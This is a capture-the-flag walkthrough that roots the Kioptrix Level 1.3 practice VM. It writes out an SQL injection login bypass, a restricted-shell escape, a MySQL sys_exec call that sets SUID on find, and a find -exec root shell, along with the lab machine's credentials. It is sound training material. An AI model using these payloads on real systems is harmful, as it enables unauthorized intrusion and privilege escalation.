CTF Challenges

Hack The Kioptrix Level-1.3 (Boot2Root Challenge)

This Kioptrix 4th VM Image is easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games is to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.

You can Download it from here and run install in your VM.

Penetration Methodologies

  • Network scanning (netdiscover, Nmap)
  • Directory brute-force (dirb)
  • Login Form SQli
  • Spwaning tty shell
  • SUID Privilege escalation
  • Get root access and capture the flag

Let’s start!!

Turn on your attacking machine and use the netdiscover command to scan your local network to get target IP.

So we target at 192.168.1.106 let go for its enumeration and scan open ports and protocols. With help nmap aggressive scan we have observed several open port and service running on it.

Since port 80 is open so without wasting time we use dirb for directory brute-force attack and enumerated /john as a directory which could give something valuable to us.

dirb http://192.168.1.106

Consequently, we explored URL http://192.168.1.106/john in the web browser and notice john.php file. Awkwardly I didn’t found any treasured from inside this file.

Further, I came back to its home page and it was login page as shown below. Here we can try SQL injection for login.

So I simply enter the following and get login successfully.

Username: john
Password: ' or 1=1 #

And welcomed by following web page which serves actual credential for the user “john”

Since we port 22 is open for ssh and we have enumerated following credential so let’s try to login to access tty shell of victim’s machine and then execute below commands.

Username: john

Password:  MyNameIsJohn

echo os.system('/bin/bash')
cd /var/www

Then view its file and directory list where you will get checklogin.php file; open it for further step.

ls
cat checklogin.php

By reading it we conclude that MySQL user name is root with No password.

Now let try to login into MySQL server with the help of the following command and try to execute some malicious query through it.

mysql -u root -p
SELECT sys_exec('chmod u+s /usr/bin/find');
echo os.system('/bin/bash')
quit

 By the mean of MySQL, we are trying to enable SUID bit for find command.

Now move to the /tmp directory and execute the following command for root access.

cd /tmp
touch raj
find raj -exec "whoami" \;
find raj -exec "/bin/sh" \;
ls
cat congrats .txt

Yuppieee!!! We finished this task and complete the challenge.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here